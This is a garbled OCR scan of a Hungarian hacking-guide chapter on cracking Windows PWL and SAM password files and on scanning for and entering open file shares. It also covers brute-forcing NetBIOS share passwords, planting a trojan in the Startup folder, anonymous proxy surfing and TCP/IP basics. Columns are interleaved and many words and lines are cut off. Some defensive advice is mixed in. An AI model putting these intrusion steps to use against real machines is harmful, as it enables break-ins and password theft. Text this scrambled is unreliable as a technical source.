felhasználó neve lesz. (dpa) Forrás: www.számol be a Der Spiegel hírmagazin nemrégiben megjelent tudósítása. A kódolt jelszó az első pillantásra még ártalmatlan Németország: Hackerek milliós csalása A nyomozók hackerek nagy szabású csalásainak a nyomára bukkantak. 30 feltételezett tettesből álló kör több ezer számítógép-felhasználó jelszavát törte fel .mondják.2 A jelszófájlok A Windows 95/98/ME PWL fájlokban tárolja a jelszavakat és a felhasználói neveket. így tárolódnak például a meghajtók és a nyomtatók hozzáférési jelszavai. a Microsoft nagyon megkönnyíti a betolakodóknak. a felhasználó költéségén szörfözhet az interneten.2. A mit sem sejtő felhasználók számlájára esetenként akár havi 20 ezer márkáért is interneteztek.

hogy a jelszó hosszabb vagy rövidebb 32 bitnél. mivel a Windows állandóan használja. amelyben rögzítve vannak a hozzáférési jogai.asp oldalon juthatunk hozzá. Az RC4 egy szimmetrikus kódolási eljárás. Ez a kulcs megakadályozza a megadott jelszavak tárolását.2. a Windowshoz sok jelszófeltörő van. Ezeknek az adatoknak az alapján a Windows 2000 ki tudja számítani a jelszavak biztonsági kockázatát. Mindegy. az adatai a Security Account Manager-hez továbbítódnak. A SAM azokat a felhasználói adatokat használja. Ezzel a kóddal és az RC4 algoritmus egy változatával kódolják az adatokat a PWL fájlokban. a Windows 95/98/ME alatt lehetőség van a HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion \Policies\Network \DisabledPwdCaching = 1 Registry-kulcs létrehozására. Hátrányként jelenik meg a kódkicserélés problémája és a ráfordításigényes kódnyilvántartás. A PassSecure a Multimedia Network Systemstől meggátolja. és ezzel lehetetlenné teszi a kiolvasásukat is. amelyek a tulajdonképpeni jelszavakat tartalmazzák.3 Jelszavak a Windows 2000 alatt A Windows 2000 alatt egészen más a jelszavak kezelése. Védelmi lehetőségek Hogy a jelszófeltörő programoktól megvédhessük magunkat. A szimmetrikus kódolás előnye mindenekelőtt a kódolás nagy sebessége. A Windows valamennyi jelszót egy SAM (Security Account Manager)adatbázisban tárol. s egyfajta „jogosultsági igazolványt" kap. Ez a Windows jelszó mellett a hálózati jelszót is őrzi. mindez azonban már sokkal több időbe telt. illetve kiolvasását. Ilyenkor a hackerek gyakran lemezre menük a PWL fájlokat. ráadásul a trójaiakba is gyakran integrálnak olyan programokat. amelynél mindkét kommunikációs partner ugyanazt teszi . a kód mindig ilyen hosszú. Egy PWL fájl tartalmaz egy header-t. amely megakadályozza a jelszavak kiolvasását. Ezt a fájlt nem lehet közvetlenül elérni. a jelszavak rendszeres változtatását és a karakterek sokszínűségét. ez az adatbázis a Registry része. fájloknál azonban sok idő kell a jelszavak kiolvasásához. mint a Windows 95/98/ME alatt. Továbbra is ajánlatos azonban. hogy az eljárást könnyű implementálni. Jelszófeltörők Mint már említettük. A nagyobb PWL A számokból és betűkből álló kombinációk a jelszófeltőrőket is megizzasztják . amelyeket ugyan továbbra is számos segédprogrammal fel lehetett törni. valamint a fájl létrejöttének a dátumát. illetve feltörését.csak ellenkező irányban. a fogadó pedig ugyanezzel a kóddal fejti meg az üzenetet. és szükség esetén figyelmezteti a felhasználót. és hogy melyik felhasználói csoporthoz tartozik. Sajnos ezt a kódot a megfelelő eszközzel másodpercek alatt fel lehet törni. és az. főleg a Windows 95 felhasználóknak. a frissítés egy erősebb kódoló algoritmusra. A felhasználói névből és a jelszóból a Windows 9x egy 32 bit hosszúságii kódot generál. amelyeket egy másik számítógépre másolhatnak. microsoft. Ha Windows 2000 alatt bejelentkezik egy felhasználó. hogy ott zavartalanul és időkorlát nélkül kikódolhassák. ami viszonylag egyszerűvé tette a hackereknek ezek megfejtését. 2. A Windows 2000 automatikusan ellenőrzi a jelszavak biztonságosságát. amelyeket a winnt/ system32/config/sam fájl tárol.com/support/kb/artícles/Q132/8/07. amelyek lehetővé teszik a célszámítógép valamennyi jelszavának azonnali kiolvasását. A Windows 2000 ellenőrzi minden jelszó hosszát. Ehhez az update-hez a http://support. A feladó egy kulccsal kódolja az átvitelre szánt adatokat. továbbá úgynevezett rekordokat is tárol.A kódolás A Microsoft a Windows 95 első verzióiban nem nagyon strapálta magát a kódolás algoritmusával. hogy a jelszófeltörők elérjék a PWL fájlokat. Van egy program is. ehhez számtalan eszköz áll a hackerek rendelkezésére a hálón. amelyek lehetővé teszik a Windows jelszavak kikódolását. s automatikusan figyelmeztet az általános jelszóbiztonság elleni vétségekre. A következő verziókban már olyan kódolási technikákat használtak.

3 A távoli elérésű támadás . hogy milyen veszélyeknek teszik ki az adataikat az internethez kapcsolódással. zók minden védelem nélküli megosztása vagy a slamposan megadott jelszavak gyakran szélesre tárják a kaput a betolakodók előtt. vigyázat! Egyet világosan kell látni: egy távolból jövő támadás egy Windows 95/98/ME rendszer ellen. szabvány konfigurációban. például a rendszer hálózatra csatlakoztatása miatt. (A jelszófeltörés témáját a 7.3. . amikor a felhasználók rendszerei gyakran folyamatosan kapcsolódnak az internethez. így például a rendszer különböző réseinek a szkennelését. a megosztás a magánemberek számára is a biztonságot meghatározó témává vált. hogy milyen megosztásokat használ a felhasználó. valóban nehéz. amelyeknek a felhasználói minden meghajtót megosztottak. LOphtCrack 2. Az első módszer a dictionary cracking. Ráadásul az ISDN. egyedüli PC-ként és trójai nélkül. amelynél gyakran használt jelszavak és karakterek listáját használja. Ebből a fejezetből kiderül. hogyan lehet felderíteni az ilyen megosztott erőforrásokat. ahol minden lehetséges szám és/vagy szókombinációt kipróbál. A könyvhöz végzett kutatások során valóban találtunk olyan rendszereket. hogy továbbra is használni tudja a régi PC-jét. Az egyik legismertebb közülük a legendás LOphtCrack 2.internetvagy hálózati felhasználók. amelyet a hackerek okoznak.Időközben azonban számos Brute Force program is íródott.és nyomtatómegosztást tulajdonképpen arra használják. főleg attól függ. Az adathordo- E szolgáltatások felhasználói általában nincsenek tisztában azzal. hogy a cél érdekében számtalan támadási módot kipróbáljanak. amelyek az NT és a Windows 2000 alatt is lehetővé teszik jelszavak hackelését. amelyet nem veszünk észre 2. A második a brute force cracking.5. hogy a háttérben egyfajta másolatot készít a SAM-fájlról.1 A fájl.) Itt egy kockázati tényező rejtőzik. Az ilyen esetek természetesen durva gondatlanságról tanúskodnak. méghozzá minden jelszóvédelem nélkül. A kár. hogy mennyire könnyelműen mozognak egyesek a hálón. Ez a program úgy kerüli ki a hozzáférési védelmet.tolvajkulcs a Windows 2000 jelszavakhoz A LOphtCrack kétféleképpen tud jelszavakat feltörni. hogy lehetővé tegyék a felhasználóknak a mappák vagy az adathordozók elérését a hálózaton. elég idejük van a hackereknek arra. az xDSL és a flatrate-ek korában. ugyanakkor újra bebizonyítják.és nyomtatómegosztás veszélyes biztonsági rések A fájl. Azonban a strandard konfigurációt gyakran meg kell változtatni. Mióta egyre több felhasználó épít ki otthon is kis hálózatocskát. 2. hogy kitalálja a jelszót. fejezet részletesen újratárgyalja.5 . vagy hogy időnként csatlakoztatni tudjon egy notebookot.

A szkennelés eredménye A DOS alatt a NET USE paranccsal is lehet kapcsolatot teremteni.2 Mik azok a szkennerek.de www. a Rhino9 szerzeménye. és hogyan működnek? A megosztások felkutatása szkennerprogramokkal történik. Név Auto NetBIOS Hacker Légion NAT SharesFinder URL www. fájlmegosztással Egy másik a Lan Guard Network Scanner. és semmilyen támadóeszköze nincs. a hálózaton keresztül elért számítógépen. Sajnos.hackerzbook.3. UNIX/Linux Windows 9x/NT. ami több szkennelést tesz szükségessé. ami azt jelenti. Az előnyei a Légionnal szemben a nagy megbízhatóság és a nagyon gyors szkennelés.hackerzbook.de www. például \\217. a Légion nagyon megbízhatatlan.3.59. A Légion minden megosztást szkennel a számítógépen.hackerzbook. Kapcsolódás egy másik számítógéphez. például a Légiont kell használni.de Operációs rendszer Windows 9x/NT/2000 Windows 9x/NT/2000. hogy a jelszófeltöréshez egy másik eszközt. . Nem nehéz felismerni a lehetséges kockázatokat és károkat. A következő ábra a megosztott C: merevlemez tartalmát mutatja egy. A megosztások felkutatásához elegendő a számítógép IP-területe Csak a számítógépről szállít információkat. Az egyik legismertebb ilyen a Légion. UNIX/Linux Windows 9x/NT/2000 Programok a megosztások felkutatásához Hozzáférés a szabad erőforrásokhoz A talált megosztott erőforrások elérése a következők szerint történik: a támadó egyszerűen beírja a talált IP-címet a Windows Intézőbe. és nem mindig találja meg azonnal a megosztott erőforrásokat.hackerzbook.2.161. majd grafikusan megjeleníti ezeket.de www.

amit némi tudással vagy megfelelő programmal könnyen ki lehet kerülni. .3. ha kap egy hibajelzést. Ilyen lehet például egy program. Annak megfelelően. Egy példa arra. ahol megvan a lehetősége. jelszó.3. A legegyszerűbb védelem: jelszavak az erőforrásokhoz 2. a fájl törlődjön. de hogy a felhasználó egy trójai becsempészésére fog-e gyanakodni. hogy milyen hozzáférési módokat adtak meg. ami a helyi hálózaton.4 Jelszóval védett megosztások A megosztott erőforrásokat természetesen jelszóval lehet védeni. és több sikerrel kecsegtető módszerek után néz.Így lehet DOS alól elérni a másik számítógépet 2. vezetékneveket. hogy senki se férjen hozzájuk jogosulatlanul a hálózatról vagy az internetről. hogy a felhasználók kényelemszeretetből gyakran könnyen megjegyezhető jelszavakat adnak meg. amely Brute Force-rohamot intéz a NetBIOS jelszó ellen. Az első. amit egy hacker programok segítsége nélkül is megtenne. hogy végiggondolja a felhasználó minden ismert személyes adatát. Kezdhetné azzal.3. pl. administrator. Egy különösen kedvelt támadási mód egy trójai vírust elhelyezni a C:\WINDOWS\STARTMENÜ\PROGRAMOK\INDÍTÓPULT könyvtárban. boss. az bizony kérdéses. De vannak gyakran használt szabvány jelszavak is. Ezt a beavatkozást esetleg észreveszik.5 Brute Porce-rohamok a megosztási jelszavak ellen A legjobb és legismertebb ilyen programok egyike a PQwak. mint például gast. Shane Hird műhelyéből Ez az eszköz többek között a Windows 95/98 alatti fájlmegosztás egy implementációs hibáját használja ki. Ezzel megvalósíthatjuk. gyakran hebehurgyán felhasznált jelszó közül. 2. hogy a felhasználót személyesen is ismeri. és ezeket jelszóként végigpróbálgatja. amit valamikor a potenciális hacker is fel fog adni. barátnő. Az is köztudott.. feltölthet. Nehéz jelszavaknál ez természetesen meglehetősen értelmetlen vállalkozás.3 Milyen lehetőségeik vannak a betolakodóknak? A megosztott mappát vagy meghajtófájlokat a megosztás módja szerint lehet elérni. vagy manipulálni a behatolók Persze ez a védelem a szimpla jelszavak esetén meglehetősen sovány. hogy csak néhányat említsünk a számtalan. születési adatokat. keresztneveket. hogy mi mindent tudnak megváltoztatni. ahogy neki tetszik. törölni. hogy a trójai szerver része (közelebbit lásd a trójaiakról szóló fejezetben) a következő bootolás után telepítődjön. Ezzel elérhető. hónapnevek vagy teszt.. admin. rendkívül hatékony is lehet. kutya nevét. a szisztematikus találgatás. a betolakodó másolhat. és a szerver elinduljon. vagy a kedve szerint törölhet.

köztük a NetBIOS-t is távolítsuk el. manipulálják a Registry-t. A trójaiak a felépítésüknél fogva kitűnően alkalmasak arra.és nyomtatómegosztás megszüntetése a hálózati környezet beállításainál. hogy teljesen az uralmuk alá hajtsanak rendszereket. amit tehetünk. Egyre jobban elterjednek a trójai-. de jelentősen megnehezíti a betörést. ami azt jelenti.megszüntetjük a megosztásokat Trójaiak . Ezeknek a programoknak a problematikája az egyszerűségükben rejlik. és egyre gyakrabban figyelnek oda arra. és megosztásokat hozzanak létre. természetesen vannak még más támadási lehetőségek is. Ez különösen a „szabadidős hackereknek" nyújt lehetőséget arra.3. ismertebb nevükön a trójaiak segítségével. adatokat másoljanak. amelynek a jelszavait fel kell törnie. és kiindulhatunk abból. hogy egy bizonyos idő múlva a még oly türelmes hacker is feladja. és amelyekre most csak röviden szeretnénk kitérni. Ez ugyan nem kínál százszázalékos védelmet. A PQwaknak egyszerűen meg kell adni annak a számítógépnek az IP-jét.betörés a hátsó ajtón keresztül Nagyon elterjedtek a támadások a hátsó ajtók. 2. és ennek megfelelő agresszivitással támadnak áldozataik rendszereire. hogy jelszavakat kémleljenek ki. A PQwak l . sok különleges karakter hiányzik. illetve víruskere- . itt semmiféle háttértudás megszerzésével nem kell foglalkozni. Mind gyakrabban használnak tűzfalakat. ha védekezni akarunk az ilyen támadások ellen: a fájl. 2. annak gyakran kell újraindítania. Szerverkörnyezetekben a rendszeradminisztrátor beállíthatja a jelszavak erősségét és futási idejét. eljárásokat indítsanak vagy fejezzenek be. A felhasználók magatartása különösen a médiák felvilágosító tevékenysége nyomán az utóbbi években erősen megváltozott. így azután a legrövidebb idő alatt szinte minden jelszót fel lehet vele törni. hogy ne nyissák meg gondatlanul a mail-ékhez csatolt fájlokat. Aránylag kényelmetlen. Tulajdonképpen csak erős jelszavak jöhetnek számításba. és aki sikert akar elérni. hogy a bonyolult támadásokkal ellentétben. Továbbá minden szükségtelen protokollt. illetve töröljenek. illetve a Remote Controll programok. amelyek megakadályozzák a trójai szerver kapcsolódását a klienshez. fejezet). amelyek védik az erőforrásokat.4 További támadási technikák A bemutatott biztonsági réseken kívül. Az ilyen programok felhasználói ritkán gondolkodnak el cselekedetük következményeiről. Itt újból bizonyítást nyer az alfanumerikus kombinációk erőssége. de veszélytelen . amelyek az operációs rendszer felépítésében gyökereznek.Előkészület a célzott támadásra Ez a megoldás azonban sok felhasználó számára szóba sem jöhet.0-s verziója nincs túl gondosan programozva. A PQwak minden karaktert és különleges karaktert felismer. mivel rá vannak utalva a megosztott erőforrások használatára.6 Óvintézkedések A legegyszerűbb. amelyek külön fejezetet kaptak a könyvben (lásd 4. amelyeket most csak bemutatunk.

akikben nem tudatosultak ezek a veszélyek. amelyek vállalati hálózatokban működtek. Ez a magatartás durván felelőtlen. és fütyülve minden figyelmeztetésre. mint a Sub7 vagy a BackOrifice (pontosabbat ezekről a programokról a trójaiakról szóló fejezetben) települtek olyan számítógépekre. illetve megfelelő figyelmeztetésekkel megakadályozni a telepítésüket. ismeretlen és komolytalan forrásból származó fájlokat nyitnak meg. .ső programok is. A gyakorlatból ismerünk olyan eseteket. mikor már régóta ismert trójaiak. de a rendszergazdák valószínűleg csak a káresetekből fognak tanulni. A védekezés és a felismerés lehetőségeivel ugyancsak a trójaiakról szóló fejezetben foglalkozunk. De még mindig elég sok felhasználó van. amelyek képesek észlelni és eltávolítani a szerveralkalmazásokat a rendszerben.

2 Az FTP 3.4 Az IP-címzés 3.........3......1 A legtöbb felhasználó sokat elárul3..2 Különböző protokollok a rétegekben 3...1......1 Mi a TCP/IP? 3.2....3. A TCP/IP 3...Tartalom 3..3..... 3. fejezet ....1 Az anonim internetezés csökkenti a kockázatot .2.......2.....2 .4 A portokról ...........3.....3. Névtelenül 3.1.3....... Az IRC 3.....3 Néhány alkalmazás és protokoll használata és a biztonságosságuk .1 A Telnet 3.. 3..

amelyek alapján hackerek figyelhetnek fel ránk. Ha egy o tartalmaz ilyen „bogárkát".1. A „normál" és az anonim szörfözés közötti kü http://privacy.ok don szörfözünk a neten. A parányi GIF-képecske (egy pixel méretű). Hogy ezeknek a részleteknek a nyilvános hogyan akadályozhatjuk meg. igen jó rálátás kíetkörülményeinkre és a szokásainkra. amit az anonim szörfözésnél el kell titk tuális IP-cím. és esetleg károkat nekünk. amint az a lenti példából is lá könnyen követni lehet az IP-címek segítségével. amelyben öntudatlanul is feladjuk az anonimit valószínűleg a legkevésbé tűnt fel. Így viszont sok emenően érthetetlen marad. stratégiáiról és őségeiről. amelyet minden számítógép az internetre lépéskor k Az interneten megtett utat. Mindenhol h nyomokat. arról természetesen szintén itt olvas 3. szörfözés célja. Aki csak általában akar a hackerek tevékenységéről tájékozt a fejezetet természetesen nem kell elolvasnia. annak az internet alapjaival is közelebbi ismeretségbe Különben bizonyos támadási lehetőségek aligha követhetőek. és gyakorlatilag úgy működik. illetve a házunk gyenge pontjait. személyes adatokat adunk meg. Mindkettő hasonlít a talán már ismert cookie-khoz. hogy kiderítse a lakásunk. ICQ vendégkönyvekben és a nyílt fórumokon. GIF-ekről. a b valamint egy korábban elhelyezett cookie információit. amikor a web-bugot megnézték. Az IP-cim minden alkalommal átmegy az adatokkal együtt. anonim internetezés csökkenti a ckázatot et az anonim szörfözésnek szenteltük. Ennek a fejezetnek az első része azt is milyen információkat kaphatnak rólunk mások.1 A legtöbb felhasználó sokat elárul e többet megtudni a hackerek tevékenységéről. nagyon pontos címzés. amelyek lehetővé tesznek bizonyos tákat. min csak ebből semmit nem lehet észrevenni. hogy megakadályozzuk saját IP-címünk átadását jobb megértés kedvéért képzeljük el egyszer az IP-címet a követggésben: egy potencionális betörőnek .mert egy hacker nem jeC-nk szempontjából . és kikapcsolni sem lehet Tehát a legfontosabb. suk a legfontosabbakat a névtelen szörfözésről . a m IRC. Így némi erhető a technikákba is. és a nézőnek egyáltalán nem tűnik fel. Ezzel akkor kell foglalkozdünk a háló kémlelésének. és ez gük lesz pontosan kideríteni az identitásunkat. Ez den bemutatja a legfontosabb információkat. Csak ennek az adatnak az ismeretében válik a aablak .a PC-nk nyitott portjához hasonlóan . az időpontot. amely valahol a webo tegrálva. de amint ez ismertté válik. egy emelettel és lakásszámmal együtt tacímhez hasonlít.net/anonymizer oldal teszi világossá.kockázattá. . a felkeresett oldal URL-jét.tudnia kell a pontos címet. a ek URL-jét. amelyek a „hacker és egyben a védekezés alapismeretei közé is tartoznak. ha „normál" mó- Egy szituáció. Csak ezután á. A kis web-bugokról van szó. mivel egészen k átadja egy szervernek az IP-címet.hiszen a névjegym osztogatjuk mindenütt. E mmi sem történhet. akkor ID-vel együtt lehet tárolni.

7 [en] (X11. Íme.cgi. ha minden protokoll Az aktuális proxy-szerverekről és csatlakozásaikról a cyberarmy. vagy legalábbis néhány közülük hatóvá válik idegenek számára: Talán már a fentiekből is világossá válhat. Azon tőség is van arra. amelyről az oldal linkjére kattintottunk (HTTP- s A legegyszerűbb.1.de természetesen újból olvasni.junkbister. és nem a din IP-t mutatják. mert egyéni igények szer ható. ben a böngésző ismeri ezeket (az e-mail-címet a böngésző jelszó tadhatja egy anonim FTP-szerverhez való hozzáféréshez. hogy mégiscsak m valamennyire az anonimitást az internetes szörfözéskor.12 i686) a Netscape-hez (angol verzió). gésző az e-mail-címeket és/vagy a login neveket is továbbítja. hogy titkosítsuk a saját IP-címünket. ahogy az előbb már említettük. és az ott tartózkodás ideje. (ezek egy táblát akasztanak ránk.de vagy a klassziku anonymizer.com/lists/proxy/ címen találunk listát. Ha ezt az oldalt most egy anonymizeren keresztül keressük fel. vagy talmakon keresztül. amelyet a számítógép egy oldalhoz választott.2.net címről. A kliens tehát össze van kötve a hosttal.Információk az Anonymizernél Úgy az IP. Ehhez egy kis m proxyk. az Anon használata. hogy védekezzünk. hogy: „Megint itt vagyok!") az interneten. 2.co kezdőknek kicsit nehezebb ennek a szoftvernek a telepíté szont kedvezőbbek a lehetőségek. egy mási milyet se mutassunk.com. Egy másik egyszerű módszer egy anonim proxy-szerveren figurálni a saját böngészőnk kapcsolatát.2 Névtelenül A cél tehát az. amelyről erre az oldalra mentünk. Hogy hetséges. Hogy mo konfiguráljuk a böngészőnket. Így például le tudja nyomni a weboldalakon található . Az ilyen oldalak működési módja: az proxy-szerver többé-kevésbé szűri. hardverként vagy szoftverként. itt például Linux 2. Ebből a rövidítésből g az is kiderül.12-t egy Intel PC-n. például Mozilla/4. hogy milyen operációs rendszer melyik verzióját uk.2. fent nevezett információt. tehát a szolg újabb betárcsázáskor egy új. l URL-je. a kliens és a hos vannak kapcsolva. Magunk is beszerezhetünk egy proxy-programot vagy egy ul a http://proxys4all. csak annak a weboldalak az információi kerülnek ki. másik IP-t oszt ki . Vanna keresőgépek is és hasonlók. Tehát a proxy képviseli a számítógépünket. hogy a következő adatok mindegyike. mint a JavaScript és hasonlók). a ho „hiszi" (az IP alapján). Mostanában a Junkb jött divatba (közelebbi információk a www. hogy csak (!) a proxy-szerverrel van ben. csak a szerver címét és a por gésző Internet-beállításainál (legjobb. mint a teljes útvonal is felismerhető. Az IP-cím és az útvonal mellett előfordulhat. azt mindjárt kiderül. néhány ezek közül: ez tartozó domain név. 3. és a hostnak a proxy IP-t. idítés a használt webböngészőhöz. és lehetőség szerint minden egyéb adatunka Egy előzetes megjegyzés: a saját IP-címünk egy internet-sz resztül történő szörfözéskor rendszerint dinamikus. mint minden más. például a http://anonsurf.

amelyeket a következő online kapcso- • Egy további kis anonimitási rés csak az Internet Explorer felhasz nyes: ezek az Active Channelek. Ez a proxy elsősorban cache-elő verként működik. ilyenkor po adhatjuk. Alapértelmezésként ez st kap. hogy milyen felhasználói névvel jelentkezzen be FTP-szerverre.0-s verzióban jelent meg. hogy kiszűrje a weboldalakról a nereket. csak egyes teket lehet találni. A WWWoffle Unix/Linux rendszerek s NT alatt fut. hogy nagy hálózati terheltséget Mixek még nem állnak nyilvánosan rendelkezésre. vagy kiköthe volítsa el a HTML-kódból a Java. Tehát: ha nincs rá feltétlenül szükségünk. ezt azonban lekapcsol Webwasher magáncélra ingyenes. A koncepciót um eredetileg e-mail küldéshez fejlesztette. és nem kell ezt a véletlenre vagy a webböngé tett alapértelmezésre bízni. és lehetővé teszi. Ha csak egyeden gbízhatóan működik. s ezekről üzeneteket küldenek. A cache-tartalmon belüli k egészítésképpen saját keresőgépet is lehet telepíteni. itt is célzottan lehet definiá headert. hogy mi kerüljön a cache-be. azé az URL-é. hanem minden elérésnél újból felismerhet érdeklődési köre a kiválasztott channel(ek) alapján meghat Active Channel technológia a már említett cookie-k szemé használja. Termés konfigurálható. a valóban a sző által elküldött sztringeket küldi el. er Windows 95/98/NT/2000-hez és a Macintosh-hoz is meg ősorban arra szolgál. amel vagy az internetre kapcsolódás indításakor betöltődik (tehát b vagy állandó kapcsolat esetén a számítógép indításakor). beleértve az online és az offline módok tást is. A mi szempontunkból azonban inkább onságai érdekesek: a Webwasherrel megakadályozható a erer küldése. Sajnos a JavaScript funkciókat minden böngészőnél lehet célzottan inaktiválni. kilistáztatául az összes.vagy a JavaScriptWWWoffle-t FTP-proxyként is lehet használni. Ez a technológia először Internet Explorer 4. A Mix hátránya. egy w ködtetője egy JavaScripten keresztül továbbra is le tudja kér címeket. az egész rendszer megbízható. feljegyzi egy listára. az animált képeket és a pop-up menüket. Mindez a ra védelmét szolgálja. és ezek után minden jogosultságot tesztel Sok szolgáltató kínál ingyenes shell-account-okat (ezek azonb . • A proxy-knál még egy fontos szempontra kell ügyelni. mert megakadályozza az olvasó „zavará mtalan reklámbannerrel. a Webwasher. a böngészőben általában külső URLtintani vagy be kell gépelni ezeket. hogy a csatorna előfizetője már nem anoni tokat egy szerverről. A cachen különböző kritériumok szerint közlekedhetünk. Minden Mix gyűjti a bejövő üzeneteket. szét és egy bizonyos idő után továbbküldi. vagy a legutóbbi kapcsolódás során meglátoga esetleg minden oldalt. vagyis a anonim marad. ő eszköz. Az Active Channelekkel ki egyet egy webszerver-üzemeltető ajánlatából (kezdőlap). hogy a Webwashert használja. A mi szempontunkból a WWWoffle főleg azért lehet a Junkbusterhez hasonlóan. amelyet minden esetben ki kell y át kell engedni. latnál fog betölteni és hasonlókat. E letilthatjuk a frame-ek vagy a képek letöltését. amelyekre rá de még nincsenek a cache-ben. akkor beszerez mag shell-accountot. Így nem lehet összefüg teni a bejövő és a kimenő üzenetek között. hogy hálózati kapcsolat ssen navigálni ebben a cache-ben. A programot szőből lehet kezelni. A Webwasher. azonban más háló sokra is átvihető. ezért ennek a leírásáról itt lemon akiknek egy kicsit több idejük van és Linux-pártiak. Még ha valóban anonim proxykat is használunk. user agentként. Pontosan megadhatjuk.de címen. és megtalálható a w. állomásból áll.i eszköz a jelenleg csak kevesek számára elérhető Mix-System. amiről sen megfeledkeznek. amelyről az oldalra kattintottak. n nem működik hibátlanul. a program lehet érdekes. megadhatunk egy URL-listát. amely az anonimitásról gondoskodhat. Létezik ugyan egy verziója Windows 95-höz is.webwasher. A kommunikáció a Mixen belül kódolt. majd az emre váltáskor kérésre automatikusan betölti. Az eg tő veszély itt is az. inkább kapcso • Ha egy hacker valami nagyobbat tervez. és így sem lehet. hogy milyen fajta webdoku milyen HTML-kódba integrált scriptek megengedettek. Hogy meghat mációkhoz juthassunk. Az oldalakat. A JavaScript utólag mégis áthúzhatja a kat.

, vagy vannak hackeroldalak, amelyeken frissen feltört accountin-ek vannak, amelyeket használni lehet.

ackerek többnyire olyan rendszereket használnak platformként dszerek megtámadásához, amelyeket már a hatalmukban tartanak, mális (legális) szörfözéshez az említett lehetőségek is teljesen ele-

Hogyan működnek a protokollok? A két protokoll, a protokollok egymásra rétegződésén, „hal stack) keresztül működik. A protocol stack az az út, amelyet az a kell tenniük ahhoz, hogy az egyik számítógépből a másikba jussa amelynek a rétegei közül a TCP/IP csak kettőt, nevezetesen a 3 használja, a következőképppen van felosztva:
Réteg Alkalmazási réteg Megjelenítő réteg Leírás

n valaki, a fenti tanácsokat megfogadva, elrejtette az IP-címét, rogram csak a proxy-szerverről gyűjthet „személyre szabott" inmivel nekünk, felhasználóknak, nem sokat árthat.

Az alkalmazási réteg képezi a csatolófelületet az alk A megjelenítő rétegben a másik számítógép rendsz

között, amelyekkel a felhasználó parancsokat küld illetve fogad egy hálózato felhasználás-specifikus formattálások történnek. Session réteg

Ez

CP/IP

gondoskodik arról, hogy az alkalmazások között megszakadt kapcsolatok helyen is folytatódjanak. Transzport réteg Ez a réteg gondoskodik a

felálljanak és - az adatvesztés megakadályozása miatt - részben ugyan

akaszban néhány protokollt szeretnénk megismertetni, amelyeket álnak. A legfontosabbak közé tartozik a Transmission Control és az Internet Protocol (IP). vetkező részben a protokolloknak azok a funkciói szerepelnek, lözhetetlenek a későbbi célokhoz, így ennek a könyvnek a hasztt közölt tudás tökéletesen elegendő. Sajnos a téma olyan kompes kifejtése messze meghaladná e könyvnek a kereteit.

adatátvitelről a két számítógép között, és gyakran csatolófelületként is szolgá alkalmazási rétegek és az alá rendelt hálózati rétegek között. Hálózati/

Ebben a rétegben folyik az optimális út (routing) keresése az kapcsolati ré (pl.: IP). Adatbiztonsági réteg réteg

adatátvitelhez. A protokollt itt már a fölé rendelt rétegektől függetlenül ki leh

Ez a réteg arról gondoskodik, hogy lehetőle

hibás átvitelek, és ha mégis lennének, akkor az adatok helyre legyenek állít illetve küldésekor.

Ez a réteg felelős a fizikai kapcsolat létrehozásáért az adato

a TCP/IP?

két hálózati protokoll neve, amelyeket az interneten és a modern használnak: az IP azonban csak két protokoll-fajta a TCP/IP protokoll-csa-

sion Control Protocol (TCP) és Internet Protocol (IP).
A TCP IP-protokollhalom rétegei az OSI-modell szerint

rotokoll-család a háló minden szolgáltatását elvégzi, ide tartozik ldése, az adatok átvitele, hozzáférés a World Wide Webhez és az tása a usenet-en keresztül.

Az adatok a számítógépből kifelé tartva az ábrázolt sorrendb resztül ezeken a rétegeken, és fordított sorrendben mennek bef szerbe. Minden réteg tud adatokat küldeni a szomszédos rét adatokat fogadni attól. Valamennyi réteg protokollokkal van öss lyek különböző szolgáltatásokat nyújtanak.

önböző protokollok a rétegekben

Parancs Chown

Leírás Egy egyszerű szövegszerkesztő.

lán valamivel érthetőbb, hogyan történik a protokollhalmon keok küldése, illetve fogadása. Most megnézzük egy kicsit közeböző rétegek legfontosabb protokolljait.

Megváltoztatja a tulajdonost és a csoportot, amelyhez eg

és/vagy egy fájl tartozik. joe

A legfontosabb Telnet-parancsok

si réteg FTP

g, amelyben a felhasználó közvetlenül egy alkalmazásba írhatja t, hogy kapcsolatot nyisson egy számítógéppel, vagy megfelelő jon ki. Fordított értelemben tehát az alkalmazási réteg az a réteg gy alkalmazás az A számítógépen a B számítógéptől is megkapait. Ebben a rétegben egész sereg protokoll van, és ezeket felülárolja semmi. Bizonyos alkalmazások itt más alkalmazásokra is en például a HP egy SNMP-re épülő programja, az OpenView. nézzük ennek a rétegnek az alkalmazásait!

A Fik Transfer Protocol egy szolgáltatás, amely minden operá belül lehetővé teszi az adatok átvitelét és azoknak a mindenkori ban mentését. Mint tudjuk, a legtöbb operációs rendszer különb tumokat használ. A Unix és a Unix-klónok gyakran NFS-t System) használnak, az OS/2 általában HPFS-t (High Performance DOS/Windows pedig kizárólag FAT-et (File Allocation Table) v Windows 2000 és az XP ezenkívül még az NTFS-t is segítség FTP-n keresztüli kommunikáció, akárcsak a Telnet, a kliens-sz épül, de valamivel komplexebb. Ebbe nem akarunk részletesebb azonban a következő pontokat megemlítjük: A kommunikáció öt fázisra osztható:
Fázis 1. fázis: Leírás

k elején még nem voltak igazi hálózatok. Voltak viszont nagygée terminálokat csatlakoztattak. Egy terminál akkoriban csak káztül tudott adatot cserélni a nagygéppel, a további terminálokkal án nem kommunikálhatott. Hogy egy újabb kábelrengeteg létesí, szoftveres megoldásra volt szükség. Így jött létre a Telnet, amely a felhasználóknak, hogy úgy tudjanak adatokat szerkeszteni stb., ülnének a másik gép shell-je (DOS promptja) előtt. A felhasznázvetlenül az alkalmazásnak kiadott paranccsal nyitott meg egy legfontosabb Telnet-parancsokat az alábbi táblázat tartalmazza.
Az aktuálisan

A kliens kérdést küld a számítógépnek, hogy a szolgáltatás

Kapcsolatfelépítés zésre áll-e, az pedig megerősítést küld, hitelesíti a felhas jelszót, és átküldi az átviteli opciókat és a fájlnev(ek)et. 2. fázis: portra vonatkozó információkat, és előkészítik a tulajdon-Adatátviteli kapadatátvitelt. Miután ezt rögzítették, elkezdődhet a tulajdon-csolat létesítése adatátvitel. 3. fázis: formában, aho-Adatátvitel gyan azt már leírtuk. 4. fázis:

Ki

Az adatátvitel az FTP-n keresztül történik, a

Leírás Létrehozza a New nevű Megváltoztatja

